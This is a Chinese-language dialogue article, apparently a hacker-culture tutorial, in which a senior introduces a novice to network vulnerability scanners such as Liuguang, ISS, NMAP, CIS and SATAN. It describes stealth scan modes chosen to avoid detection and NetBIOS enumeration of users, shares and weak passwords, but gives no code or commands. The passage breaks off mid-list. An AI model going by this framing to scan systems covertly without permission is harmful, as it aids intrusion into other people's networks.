  “你說的不錯,但是雖然小榕的流光非常出色,併兼備強大的破解和***成份,但是總的來說它不能算的上是一個真正的掃描器。而且流光主要體現在破解,***性很強,沒有太多的對目標系統掃描後的分析報告,所以流光在我看來只能算是是一個涵蓋掃描功能的強大破解軟件。”
  “那麼在前輩的眼中,什麼樣的軟件是一個強大的掃描軟件,什麼樣的掃描器才能成爲***手中的屠龍刀?”
  “一個好的掃描器必須有簡潔和易於使用的操作界面,強大的分析和掃描信息範圍,對最新漏洞的掃描判斷能力(也就是通常所說的升級概念),詳細的分析結果報告和對漏洞的描述與對策。這樣的“刀”才能算的上是***手中的一把寶刀。”
  “前輩能否給我點評一下如今最爲流行的掃描器的特點和性能呢?”
  “說道當今網絡安全界流行的掃描器,其中最爲優秀的就要算是ISS公司出品的商業掃描器了。它能針對上千種的系統和軟件漏洞對服務器作出全面的細微掃描,而且能夠生成比較詳細的掃描報告,應該說是先進最好的掃描器了。”
  “前輩這個掃描器我可以從什麼地方下載?”
  “無知!商業掃描器,當然是不能免費下載的了,你要花錢去買!”
  “還需要花錢啊,哪有沒有不花錢的掃描器呢?”
  “當然有了,掃描器是***必備的工具之一,要是都花錢去買那不符合***的風格。我們可以在網上找到很多免費的而且同樣很優秀的***掃描器。在國外比較常用的有Cerberus Internet Scanner簡稱CIS,還有烏克蘭SATAN。我們國內的也有安全焦點的X-Scanner,與小榕的流光。”
  “前輩說的這幾種掃描器我只用過流光,我個人認爲流光很出色,其他的掃描器也只有所耳聞,但不知道有什麼特點,還請前輩賜教。”
  “比起你用過的流光來說,ISS算得上是一個真正的管理員使用的系統掃描工具,首先它能掃描一些衆所周知的系統漏洞和系統弱點,包括一些往往被用戶忽略的問題,這些問題是一些經常被***利用的漏洞和弱點。ISS有更爲強大的漏洞分析功能,並且它不會允許非法訪問,但是實際情況是ISS已經背離了它的初衷目的。”
  “任何好的事物都有不利的一面,更何況一把刀,而且是把寶刀。”
  “這話不錯,ISS的確是安全界最爲出色的掃描器,而且他還是第一個可以公開得到的多層次掃描器。特別是它的可移植性和靈活性,衆多的UNIX的平臺上都可以運行ISS,ISS的掃描時間和效率也是很快的,很適合於企業級的用戶。”
“前輩,我插一句話,雖然ISS足夠強大,但是它畢竟不是免費的午餐,這就不符合我們的***精神了。您那裏有沒有一些強大而且免費的掃描器?”
  “掃描器龐大的家族中怎麼會沒有免費的,你聽說過NMAP嗎?”
  “NMAP倒是有所耳聞,以前在許多安全網站上見到過這個名字,但是我不知道它是幹什麼用的一個東西。”
  “NMAP其實就是一個功能強大的掃描器。它的強大之處在於它支持UDP,TCP (connect),TCP SYN(half open),ftp proxy(bounce attack),Reverse-ident,ICMP(ping sweep),FIN,ACK sweep,Xmas Tree,SYN sweep,Null等多種掃描協議和掃描方式。但是總的來說它的最大的優點莫過於隱蔽性高,這是由於它採用的是“半開”的一種掃描方式,此外它提供的Stealth FIN,Xmas Tree與Null掃描模式更是讓被掃描者難以發現。也正是因爲這一點的原因,NMAP深受一些骨灰級***的喜愛。像一般***喜歡的祕密掃描、動態延遲、重發與平行掃描、欺騙掃描、端口過濾探測、RPC直接掃描、分佈掃描等,NMAP均可以實現,可以說NMAP是一個靈活性很大的掃描器。通過強大系統的掃描,它還可以分析出服務器的端口處於Open狀態還是被防火牆保護狀態。總之它的強大是不言而喻的,如果你有一臺聯網的Linux或者UNIX計算機,那麼你就可以去http://www.insecure.org/nmap/ 下載得到它。
十二樓
***常用兵器之掃描篇(下)

  “前輩,我的系統使用的是Windows,您能不能介紹一些我這種菜鳥級***也能用的掃描器?當然前提是在Windows系統下運行啊。”
  “既然這樣,我想Cerberus Internet Scanner(CIS)可能比較合適與你,它主要運行在Windows NT和Windows2000的平臺下面,當然它也主要是針對微軟的Windows操作系統進行探測掃描的。CIS擁有絕大多數菜鳥喜歡的Windows友好界面,而且它提供進行掃描的安全問題也是通常在Windows中經常見到的,其中包括:
  (1) WWW服務
  (2) FTP服務
  (3) MS SQL Server 數據庫掃描
  (4) NetBIOS 共享掃描
  (5) 註冊表設置
  (6) NT服務漏洞
  (7) SMTP服務掃描
  (8) POP3服務掃描
  (9) RPC服務掃描
  (10) 端口映射
  (11) Finger服務
  (12) DNS安全掃描
  (13) 瀏覽器安全等
 
  在CIS中,它最爲引人注目的還要數NetBIOS共享掃描。CIS能根據NetBIOS這一漏洞作出NETBIOS資源信息、共享資源、計算機用戶名、工作組和薄弱的用戶口令等詳細的掃描分析。它的操作方法也是非常的容易,你只需要輸入目標服務器的地址,然後選擇你想要掃描的相關漏洞就可以進行掃描分析了。掃描完畢後他會主動生成一個HTML的報告共你分析結果。你可以在http://www.cerberus-infosec.co.uk/ 下載獲得。”
“這款掃描器的功能是否太過於簡單了哪?我感覺它比起前幾個您說的那些掃描器,功能過於少了,而且沒有流光那麼有成效。”

  “SATAN作爲掃描器的鼻祖可能很適合你,由於它採用的是一個Perl的內核,通過PERL調用大量的C語言的檢測工具對目標網站進行分析,所以你打開瀏覽器用IE方式就可以直接操作,使用也相對簡單,我就不在這裏介紹他浪費時間了。
  作爲***的利刃,國產的CGI & Web Scanner也是一個不錯的掃描器,這個寶刀是由zer9設計完成打造的。這款掃描器主要是針對動態網站技術的安全問題來設計的。”
  “動態網站?”
  “對,動態網站。隨着網站設計的日趨複雜化,網站的技術人員會利用一些諸如CGI、ASP、PHP、jsP等網站動態交互技術與相應的服務軟件對網站進行開發,這些東西大大地減輕了網站的維護和更新工作量,但是也正是這些技術,導致了大量的安全問題,特別是很多網站動態第三方程序在設計之初根本就沒有對安全問題考慮太多,導致了大量的系統漏洞的出現。而CGI & Web Scanner就是專門針對這些動態的網頁上出現的漏洞進行掃描的一把利刃。
  CGI & Web Scanner的主要功能有:
  (1)
 
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章